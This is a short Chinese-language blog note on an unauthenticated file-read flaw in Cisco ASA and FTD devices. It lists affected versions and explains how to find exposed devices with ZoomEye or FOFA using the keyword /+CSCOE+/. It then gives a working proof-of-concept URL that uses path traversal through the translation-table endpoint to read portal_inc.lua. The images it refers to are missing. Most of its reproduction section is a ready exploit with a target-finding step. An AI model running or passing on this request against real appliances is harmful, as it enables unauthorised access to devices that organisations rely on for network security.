一、前言
前端時間碰到了該漏洞,記錄一下!
二、漏洞介紹
該漏洞爲思科ASA設備和FTD設備的未授權任意文件讀取漏洞,但僅能讀取到WEB
目錄下的文件,影響版本如下:
-
Cisco ASA:<= 9.6
-
Cisco ASA:9.7 , 9.8 , 9.9 , 9.10 , 9.12 , 9.13 , 9.14
-
Cisco FTD:6.2.2 , 6.2.3 , 6.3.0 , 6.4.0 , 6.5.0 , 6.6.0
三、漏洞復現
首先利用zoomeye
或者fofa
搜索設備,搜索關鍵詞爲/+CSCOE+/
,如下圖所示:
POC
爲URL/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
,如下圖所示: